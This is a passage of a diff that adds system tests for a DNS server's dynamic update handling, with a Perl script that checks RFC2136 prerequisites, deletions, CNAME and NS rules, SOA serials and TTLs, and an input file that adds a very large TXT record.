+test("NOERROR", ["pre", nxrrset("a.$zone A")]); +# RRset exists (value dependent) +test("NXRRSET", ["pre", yxrrset("a.$zone A 73.80.65.49")]); + + +section ("Simple creation of data"); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.49")]); + +section ("Simple prerequisites in the presence of data"); +# Name is in use +test("NOERROR", ["pre", yxdomain("a.$zone")]); +# RRset exists (value independent) +test("NOERROR", ["pre", yxrrset("a.$zone A")]); +# Name is not in use +test("YXDOMAIN", ["pre", nxdomain("a.$zone")]); +# RRset does not exist +test("YXRRSET", ["pre", nxrrset("a.$zone A")]); +# RRset exists (value dependent) +test("NOERROR", ["pre", yxrrset("a.$zone A 73.80.65.49")]); + +# +# Merging of RRsets +# +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.50")]); + +section("Detailed tests of \"RRset exists (value dependent)\" prerequisites"); +test("NOERROR", ["pre", + yxrrset("a.$zone A 73.80.65.49"), + yxrrset("a.$zone A 73.80.65.50")]); +test("NOERROR", ["pre", + yxrrset("a.$zone A 73.80.65.50"), + yxrrset("a.$zone A 73.80.65.49")]); +test("NXRRSET", ["pre", yxrrset("a.$zone A 73.80.65.49")]); +test("NXRRSET", ["pre", yxrrset("a.$zone A 73.80.65.50")]); +test("NXRRSET", ["pre", + yxrrset("a.$zone A 73.80.65.49"), + yxrrset("a.$zone A 73.80.65.50"), + yxrrset("a.$zone A 73.80.65.51")]); + + +section("Torture test of \"RRset exists (value dependent)\" prerequisites."); + +test("NOERROR", ["update", + rr_add("e.$zone 300 A 73.80.65.49"), + rr_add("e.$zone 300 TXT 'one'"), + rr_add("e.$zone 300 A 73.80.65.50")]); +test("NOERROR", ["update", + rr_add("e.$zone 300 A 73.80.65.52"), + rr_add("f.$zone 300 A 73.80.65.52"), + rr_add("e.$zone 300 A 73.80.65.51")]); +test("NOERROR", ["update", + rr_add("e.$zone 300 TXT 'three'"), + rr_add("e.$zone 300 TXT 'two'")]); +test("NOERROR", ["update", + rr_add("e.$zone 300 MX 10 mail.$zone")]); + +test("NOERROR", ["pre", + yxrrset("e.$zone A 73.80.65.52"), + yxrrset("e.$zone TXT 'two'"), + yxrrset("e.$zone A 73.80.65.51"), + yxrrset("e.$zone TXT 'three'"), + yxrrset("e.$zone A 73.80.65.50"), + yxrrset("f.$zone A 73.80.65.52"), + yxrrset("e.$zone A 73.80.65.49"), + yxrrset("e.$zone TXT 'one'")]); + + +section("Subtraction of RRsets"); +test("NOERROR", ["update", rr_del("a.$zone A 73.80.65.49")]); +test("NOERROR", ["pre", + yxrrset("a.$zone A 73.80.65.50")]); + +test("NOERROR", ["update", rr_del("a.$zone A 73.80.65.50")]); +test("NOERROR", ["pre", nxrrset("a.$zone A")]); +test("NOERROR", ["pre", nxdomain("a.$zone")]); + +section("Other forms of deletion"); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.50")]); +test("NOERROR", ["update", rr_add("a.$zone 300 MX 10 mail.$zone")]); +test("NOERROR", ["update", rr_del("a.$zone A")]); +test("NOERROR", ["pre", nxrrset("a.$zone A")]); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.50")]); +test("NOERROR", ["update", rr_del("a.$zone")]); +test("NOERROR", ["pre", nxdomain("a.$zone")]); + +section("Case insensitivity"); +test("NOERROR", ["update", rr_add("a.$zone 300 PTR foo.net.")]); +test("NOERROR", ["pre", yxrrset("A.$zone PTR fOo.NeT.")]); + +section("Special CNAME rules"); +test("NOERROR", ["update", rr_add("b.$zone 300 CNAME foo.net.")]); +test("NOERROR", ["update", rr_add("b.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["pre", yxrrset("b.$zone CNAME foo.net.")]); +test("NOERROR", ["pre", nxrrset("b.$zone A")]); + +test("NOERROR", ["update", rr_add("c.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("c.$zone 300 CNAME foo.net.")]); +test("NOERROR", ["pre", yxrrset("c.$zone A")]); +test("NOERROR", ["pre", nxrrset("c.$zone CNAME")]); + +# XXX should test with SIG, KEY, NXT, too. + +# +# Currently commented out because Net::DNS does not properly +# support WKS records. +# +#section("Special WKS rules"); +#test("NOERROR", ["update", rr_add("c.$zone 300 WKS 73.80.65.49 TCP telnet ftp")]); +#test("NOERROR", ["update", rr_add("c.$zone 300 WKS 73.80.65.49 UDP telnet ftp")]); +#test("NOERROR", ["update", rr_add("c.$zone 300 WKS 73.80.65.50 TCP telnet ftp")]); +#test("NOERROR", ["update", rr_add("c.$zone 300 WKS 73.80.65.49 TCP smtp")]); +#test("NOERROR", ["pre", +# yxrrset("c.$zone WKS 73.80.65.49 TCP smtp"), +# yxrrset("c.$zone WKS 73.80.65.49 UDP telnet ftp"), +# yxrrset("c.$zone WKS 73.80.65.50 TCP telnet ftp")]); + + +section("Special NS rules"); + +# Deleting the last NS record using "Delete an RR from an RRset" +# should fail at the zone apex and work elsewhere. The pseudocode +# in RFC2136 says it should fail everywhere, but this is in conflict +# with the actual text. + +# Apex +test("NOERROR", ["update", + rr_add("$zone 300 NS ns1.$zone"), + rr_add("$zone 300 NS ns2.$zone")]); +test("NOERROR", ["update", rr_del("$zone NS ns1.$zone")]); +test("NOERROR", ["update", rr_del("$zone NS ns2.$zone")]); +test("NOERROR", ["pre", + yxrrset("$zone NS ns2.$zone")]); + +# Non-apex +test("NOERROR", ["update", rr_add("n.$zone 300 NS ns1.$zone")]); +test("NOERROR", ["update", rr_del("n.$zone NS ns1.$zone")]); +test("NOERROR", ["pre", nxrrset("n.$zone NS")]); + +# Other ways of deleting NS records should also fail at the apex +# and work elsewhere. + +# Non-apex +test("NOERROR", ["update", rr_add("n.$zone 300 NS ns1.$zone")]); +test("NOERROR", ["update", rr_del("n.$zone NS")]); +test("NOERROR", ["pre", nxrrset("n.$zone NS")]); + +test("NOERROR", ["update", rr_add("n.$zone 300 NS ns1.$zone")]); +test("NOERROR", ["pre", yxrrset("n.$zone NS")]); +test("NOERROR", ["update", rr_del("n.$zone")]); +test("NOERROR", ["pre", nxrrset("n.$zone NS")]); + +# Apex +test("NOERROR", ["update", rr_del("$zone NS")]); +test("NOERROR", ["pre", + yxrrset("$zone NS ns2.$zone")]); + +test("NOERROR", ["update", rr_del("$zone")]); +test("NOERROR", ["pre", + yxrrset("$zone NS ns2.$zone")]); + +# They should not touch the SOA, either. + +test("NOERROR", ["update", rr_del("$zone SOA")]); +test("NOERROR", ["pre", yxrrset("$zone SOA")]); + + +section("Idempotency"); + +test("NOERROR", ["update", rr_add("d.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["pre", yxrrset("d.$zone A 73.80.65.49")]); +test("NOERROR", ["update", + rr_add("d.$zone 300 A 73.80.65.49"), + rr_del("d.$zone A")]); +test("NOERROR", ["pre", nxrrset("d.$zone A")]); + +test("NOERROR", ["update", rr_del("d.$zone A 73.80.65.49")]); +test("NOERROR", ["pre", nxrrset("d.$zone A")]); +test("NOERROR", ["update", + rr_del("d.$zone A"), + rr_add("d.$zone 300 A 73.80.65.49")]); + +test("NOERROR", ["pre", yxrrset("d.$zone A")]); + +section("Out-of-zone prerequisites and updates"); +test("NOTZONE", ["pre", yxrrset("a.somewhere.else. A 73.80.65.49")]); +test("NOTZONE", ["update", rr_add("a.somewhere.else. 300 A 73.80.65.49")]); + + +section("Glue"); +test("NOERROR", ["update", rr_add("s.$zone 300 NS ns.s.$zone")]); +test("NOERROR", ["update", rr_add("ns.s.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["pre", yxrrset("ns.s.$zone A 73.80.65.49")]); + +section("Wildcards"); +test("NOERROR", ["update", rr_add("*.$zone 300 MX 10 mail.$zone")]); +test("NOERROR", ["pre", yxrrset("*.$zone MX 10 mail.$zone")]); +test("NXRRSET", ["pre", yxrrset("w.$zone MX 10 mail.$zone")]); +test("NOERROR", ["pre", nxrrset("w.$zone MX")]); +test("NOERROR", ["pre", nxdomain("w.$zone")]); + + +section("SOA serial handling"); + +my $soatimers = "20 20 1814400 3600"; + +# Get the current SOA serial number. +my $query = $res->query($zone, "SOA"); +my ($old_soa) = $query->answer; + +my $old_serial = $old_soa->serial; + +# Increment it by 10. +my $new_serial = $old_serial + 10; +if ($new_serial > 0xFFFFFFFF) { + $new_serial -= 0x80000000; + $new_serial -= 0x80000000; +} + +# Replace the SOA with a new one. +test("NOERROR", ["update", rr_add("$zone 300 SOA mname1. . $new_serial $soatimers")]); + +# Check that the SOA really got replaced. +($db_soa) = $res->query($zone, "SOA")->answer; +assert($db_soa->mname eq "mname1"); + +# Check that attempts to decrement the serial number are ignored. +$new_serial = $old_serial - 10; +if ($new_serial < 0) { + $new_serial += 0x80000000; + $new_serial += 0x80000000; +} +test("NOERROR", ["update", rr_add("$zone 300 SOA mname2. . $new_serial $soatimers")]); +assert($db_soa->mname eq "mname1"); + +# Check that attempts to leave the serial number unchanged are ignored. +($old_soa) = $res->query($zone, "SOA")->answer; +$old_serial = $old_soa->serial; +test("NOERROR", ["update", rr_add("$zone 300 SOA mname3. . $old_serial " . + $soatimers)]); +($db_soa) = $res->query($zone, "SOA")->answer; +assert($db_soa->mname eq "mname1"); + +# +# Currently commented out because Net::DNS does not properly +# support multiple strings in TXT records. +# +#section("Big data"); +#test("NOERROR", ["update", rr_add("a.$zone 300 TXT aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc")]); +#test("NOERROR", ["update", rr_del("a.$zone TXT aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc")]); +test("NOERROR", ["update", rr_add("a.$zone 300 TXT " . ("foo " x 3))]); + +section("Updating TTLs only"); + +test("NOERROR", ["update", rr_add("t.$zone 300 A 73.80.65.49")]); +($a) = $res->query("t.$zone", "A")->answer; +$ttl = $a->ttl; +assert($ttl == 300, "incorrect TTL value $ttl != 300"); +test("NOERROR", ["update", + rr_del("t.$zone A 73.80.65.49"), + rr_add("t.$zone 301 A 73.80.65.49")]); +($a) = $res->query("t.$zone", "A")->answer; +$ttl = $a->ttl; +assert($ttl == 301, "incorrect TTL value $ttl != 301"); + +# Add an RR that is identical to an existing one except for the TTL. +# RFC2136 is not clear about what this should do; it says "duplicate RRs +# will be silently ignored" but is an RR differing only in TTL +# to be considered a duplicate or not? The test assumes that it +# should not be considered a duplicate. +test("NOERROR", ["update", rr_add("t.$zone 302 A 73.80.65.50")]); +($a) = $res->query("t.$zone", "A")->answer; +$ttl = $a->ttl; +assert($ttl == 302, "incorrect TTL value $ttl != 302"); + +section("TTL normalization"); + +# The desired behaviour is that the old RRs get their TTL +# changed to match the new one. RFC2136 does not explicitly +# specify this, but I think it makes more sense than the +# alternatives. + +test("NOERROR", ["update", rr_add("t.$zone 303 A 73.80.65.51")]); +(@answers) = $res->query("t.$zone", "A")->answer; +$nanswers = scalar @answers; +assert($nanswers == 3, "wrong number of answers $nanswers != 3"); +foreach $a (@answers) { + $ttl = $a->ttl; + assert($ttl == 303, "incorrect TTL value $ttl != 303"); +} + +section("Obscuring existing data by zone cut"); +test("NOERROR", ["update", rr_add("a.u.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("b.u.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("u.$zone 300 TXT txt-not-in-nxt")]); +test("NOERROR", ["update", rr_add("u.$zone 300 NS ns.u.$zone")]); + +test("NOERROR", ["update", rr_del("u.$zone NS ns.u.$zone")]); + +if ($Net::DNS::VERSION < 1.01) { + print "skipped Excessive NSEC3PARAM iterations; Net::DNS too old.\n"; +} else { + section("Excessive NSEC3PARAM iterations"); + test("REFUSED", ["update", rr_add("$zone 300 NSEC3PARAM 1 0 151 -")]); + test("NOERROR", ["update", rr_add("$zone 300 NSEC3PARAM 1 0 150 -")]); +} + +if ($failures) { + print "$failures tests failed.\n"; +} else { + print "All tests successful.\n"; +} +exit $failures; diff --git a/bin/tests/system/nsupdate/verylarge.in b/bin/tests/system/nsupdate/verylarge.in new file mode 100644 index 0000000..2e66221 --- /dev/null +++ b/bin/tests/system/nsupdate/verylarge.in @@ -0,0 +1,3 @@ +server 10.53.0.1 @PORT@ +update add txt.update.nil. 600 TXT 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 